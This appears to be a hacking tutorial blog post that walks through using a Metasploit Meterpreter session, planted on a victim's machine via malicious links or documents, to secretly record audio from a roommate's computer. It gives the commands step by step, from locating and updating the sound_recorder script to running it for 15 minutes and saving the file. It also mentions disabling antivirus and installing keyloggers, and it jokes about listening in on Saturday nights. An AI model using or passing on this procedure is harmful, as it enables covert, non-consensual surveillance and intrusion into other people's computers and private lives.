Welcome back, my tenderfoot hackers!
So many of you responded positively to my post about using the keylogger, as well as my post regarding turning on the webcam, that I decided that you might enjoy another similar hack. In this article, we will enable the audio recording capability on the remote system of your roommate.
Once again, let's fire up Metasploit from BackTrack and embed the Meterpreter on the remote or victim system. There are a number of ways of doing this, so check back to my earlier posts to see how to install it via a malicious clickable link, a malicious Microsoft Office document or Adobe Acrobat file, and more.
From here, we should have a Meterpreter prompt on our system that reflects the control panel of the Meterpreter on the remote victim system.
Here we have almost total control of their system. We can turn off their antivirus system, embed a software keylogger, turn on their webcam, etc. In this case, we will use a script that turns on the sound recording on our roommate's computer system and enables us to play back this recording at a later time.
As this script is relatively new (2010), let's make certain that your version of Metasploit has the sound recorder script. First, open a second terminal and navigate to the following directory.
root@bt > cd /opt/metasploit/msf3/scripts/meterpreter
Once we are in this directory, simply do a listing of all files by typing:
root@bt:/opt/metasploit/msf3/scripts/meterpreter > ls -l
The script should appear among the list of meterpreter scripts. If it doesn't, you can either update your Metasploit by typing in the msfconsole:
msf > msfupdate
Or you can download the script here.
Make sure that you save it to the directory /opt/metasploit/msf3/scripts/meterpreter.
Now that we have the script in the proper directory, let's run it. First, let's look at the help file by typing:
meterpreter > run sound_recorder -h
Notice that we have just a couple of options. We can specify the number of 30-second intervals to record with the -i switch and the directory to save the recorded file to with the -l switch. So, let's record 15 minutes (30 x 30 seconds = 15 minutes) of our roommate and save the file in the /etc directory. We can do this by typing:
meterpreter > run sound_recorder -i 30 -l /etc
When the recording has completed, the Meterpreter will save it to a file on our system in the directory we specified, in this case the /etc directory.
Now we simply need to open that audio file in an audio player and we can hear everything that was going on in our roommate's room during those 15 minutes.
This could be fun! Who knows what might be on that 15 minutes of recording every Saturday night!